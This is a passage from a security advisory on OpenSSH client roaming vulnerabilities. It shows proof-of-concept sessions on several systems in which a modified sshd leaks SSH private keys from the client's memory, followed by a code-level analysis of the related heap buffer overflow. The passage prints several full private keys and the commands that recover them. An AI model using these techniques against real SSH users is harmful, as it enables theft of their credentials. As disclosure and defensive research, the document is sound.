$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= -----END DSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:768" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-9448bb7f/infoleak
MIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP grGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe 4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY 8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw oM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP IeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4 cRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+ iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To ...
env ROAMING="client_out_buf_size:1024" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-279f5e2b/infoleak
... iUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To zEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh PHatTfiy5p82Q8+TD60= ...
Private Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013
$ /usr/bin/ssh -V OpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:2048" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-35ee7ab0/infoleak
MIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc VEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL 9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175 ynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn w8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU MANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh oxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY mwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M k3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G +umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95 n5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt 8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw rsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5 cMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb 3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV WGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ pCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM T32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY FTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-6cb31d82/infoleak
... uvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn zIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF ALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1 /tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk kRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS Y1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=
Private Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key
$ head -n 1 /etc/motd OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
$ /usr/bin/ssh -V OpenSSH_7.0, LibreSSL 2.2.2
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8 L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19 qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg== -----END RSA PRIVATE KEY-----
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1 [connection suspended, press return to resume]Segmentation fault (core dumped)
(this example requires a ProxyCommand because of the NULL-aitop bug described in the Mitigating Factors of the Information Leak section, and crashes because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section)
cat /tmp/roaming-a5eca355/infoleak
ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
Private Key Disclosure example: CentOS 7, 1024-bit DSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="CentOS Linux 7 (Core)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_dsa -----BEGIN DSA PRIVATE KEY----- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2 hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4= -----END DSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-b7b16dfc/infoleak
jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
strings /tmp/roaming-b324ce87/infoleak
IuQL R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9v
strings /tmp/roaming-24011739/infoleak
KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
strings /tmp/roaming-37456846/infoleak
LsBlstpuQ4Hr2DHmalL8X iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA yq4Kwj/
strings /tmp/roaming-988ff54c/infoleak
GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
strings /tmp/roaming-53887fa5/infoleak
/4oatxFUV5V8aniqyq4Kwj/ QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS F9AoVoZFKEGn4FEoYIqY3a4
Private Key Disclosure example: Fedora 20, 2048-bit RSA key
$ grep PRETTY_NAME= /etc/os-release PRETTY_NAME="Fedora 20 (Heisenbug)"
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5 r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+ ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU= -----END RSA PRIVATE KEY-----
env ROAMING="heap_massaging:linux" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 ...
strings /tmp/roaming-a2bbc5f6/infoleak
cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
strings /tmp/roaming-47b46456/infoleak
RGAcE0nc GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o 6GEmk/oB9
strings /tmp/roaming-7a6717ae/infoleak
cawMW4LZ1 Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
strings /tmp/roaming-f3091f08/infoleak
lZ3w0qHe nSolsDs2k8wHbVP4VtLE8l PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
strings /tmp/roaming-62a9e9a3/infoleak
lZ3w0qHe r3TwTa0pPEk11 LbcsTEJ rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo /euhzdYixxIkfqyopnYFoER26u37/OHe37P
strings /tmp/roaming-8de31ed5/infoleak
7qyvNznQ 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
strings /tmp/roaming-f5e0fbcc/infoleak
yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
strings /tmp/roaming-9be933df/infoleak
QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
strings /tmp/roaming-ee4d1e6c/infoleak
SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
strings /tmp/roaming-c2bfd69c/infoleak
SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
strings /tmp/roaming-2b3217a1/infoleak
DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
strings /tmp/roaming-1e275747/infoleak
g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================
Analysis
Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:
239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }
-
packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
-
ssh_connect() opens new file descriptors, and connects them to the SSH server.
-
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
-
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.
The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:
-
In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
-
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
-
packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
